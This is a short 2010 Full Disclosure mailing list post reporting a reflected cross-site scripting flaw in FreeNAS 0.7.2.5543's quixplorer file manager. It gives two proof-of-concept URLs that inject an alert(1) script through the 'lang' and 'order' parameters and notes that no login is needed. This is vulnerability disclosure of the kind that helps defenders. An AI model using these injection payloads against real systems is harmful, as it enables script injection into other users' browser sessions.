Full Disclosure mailing list archives

Good morning, you can xss freenas stable (0.7.2.5543).


From: dave b <db.pub.mail () gmail com>
Date: Tue, 21 Dec 2010 03:11:32 +1100

Good morning, you can xss freenas stable (0.7.2.5543)
like this

http://192.168.0.1/quixplorer/index.php?action=list&order=name&srt=yes&lang=en%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

or this ...
http://192.168.0.1/quixplorer/index.php?action=list&order=nan%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Eme&srt=yes
etc.

This will work regardless of the user being logged into the quixplorer
module or freenas.

--
question = ( to ) ? be : ! be;          -- Wm. Shakespeare

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Current thread: